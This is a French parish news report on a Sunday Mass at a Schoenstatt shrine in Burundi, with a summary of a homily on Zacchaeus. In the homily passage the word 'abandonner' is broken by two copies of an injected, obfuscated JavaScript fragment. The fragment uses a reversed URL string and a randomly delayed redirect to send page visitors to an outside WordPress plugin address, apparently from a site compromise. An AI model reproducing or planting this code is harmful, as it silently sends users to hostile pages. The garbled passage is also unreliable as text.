La Messe de 10 heures de ce trente-unième Dimanche du Temps Ordinaire au Sanctuaire marial de Schoenstatt de Mont Sion Gikungu a été célébrée par le Père Économe, Père Marcien NDAYIZEYE en concélébration avec le Recteur du Sanctuaire, Père Longin NTIRANYIBAGIRA et l’Abbé Emmanuel BAFULO, venu depuis peu de la RDC pour poursuivre ses études. Comme ce Dimanche était le dernier dimanche du mois d’octobre, les élèves de l’École Technique Secondaire de Kamenge ont effectué un pèlerinage. La chorale Sainte Famille a animé cette Eucharistie en chants liturgiques.

Les saintes écritures ont été tirées respectivement du livre de la Sagesse (Sg 11, 22 – 12, 2), de la deuxième lettre de saint Paul apôtre aux Thessaloniciens (2 Th 1, 11 – 2, 2) et de l’Évangile de Jésus Christ selon saint Luc (Lc 19, 1-10).

Dans son homélie, le célébrant est parti du refrain du chant « NKUBONE » très chanté et très aimé par les fidèles durant communion. Chers frères et sœurs, continue le Père NDAYIZEYE, tout le monde veut voir Jésus ce qui est une très bonne chose mais combien d’entre nous ose faire le premier pas ? Nous l’appelons, nous voulons le voir mais nous nous cachons souvent malgré ce souhait, cet envi. Nous l’appelons mais étant souvent dans l’obscurité, dans nos vicissitudes de l’existence. Et quand Jésus arrive pour nous voir, ils ne nous voient pas. Avant même de chercher à le voir, le rencontrer, il est déjà au Rendez-vous. Il nous connaît plus que nous osons le croire. L’exemple typique c’est le cas de Zachée qui a été surpris d’entendre Jésus l’appelait par son nom : « Zachée, descends vite : aujourd’hui il faut que j’aille demeurer dans ta maison. » Ceci pour nous montrer que Jésus nous aime de tout son cœur, veut nous venir en aide et n’attende que notre premier pas vers lui.

Le Père Économe a poursuivi avec la première lecture qui montre comment Dieu as pitié de tous les hommes, son seul souhait est qu’ils puissent se convertir, se détourner du mal et croire en lui et lui, dans sa bonté et son amour, fermera ses yeux sur leurs péchés.

Et de citer le cas de l’apôtre Paul qui persécutait les chrétiens avant sa conversion. Dans la vie d’avant, il menaçait les chrétiens mais aujourd’hui, après avoir rencontré le Seigneur à Damas, c’est lui qui intercède pour les autres et les prodigue des conseils. Ceci pour vous montrer comment il est bénéfique de recevoir le Seigneur.

Le prédicateur est encore revenu sur le cas de Zachée, le chef des collecteurs d’impôts. Ce poste qu’il occupait dans le temps je le comparerai aujourd’hui à un agent de l’OBR chef de la poste frontalière de GATUMBA ou de KOBERO. Vous comprenez bien que ce poste n’était pas moindre. Imagine votre réaction aujourd’hui si vous voyez un haut cadre du pays au-dessus d’un arbre comme Zachée ! Vous serez plus que surpris je pense. Le cas de Zachée nous montre que dans la vie pour rencontrer Jésus, il faut prendre une décision ferme de tout laisser, tout abantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner à la gloire de Dieu. Prenons toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc chère Assemblée de Dieu, la ferme décision de laisser derrière nous nos richesses, nos gloires et mérites, pour voir Jésus et se laissait transformer par lui comme Zachée. Prions le Seigneur qu’il nous aide.

Signalons qu’à la fin de l’Eucharistie, il y a eu procession vers le Sanctuaire pour remercier Dieu à travers Vierge Marie pour tous les bienfaits obtenus pendant tout le mois d’octobre et lui confier le mois de novembre.

Germain Nahimana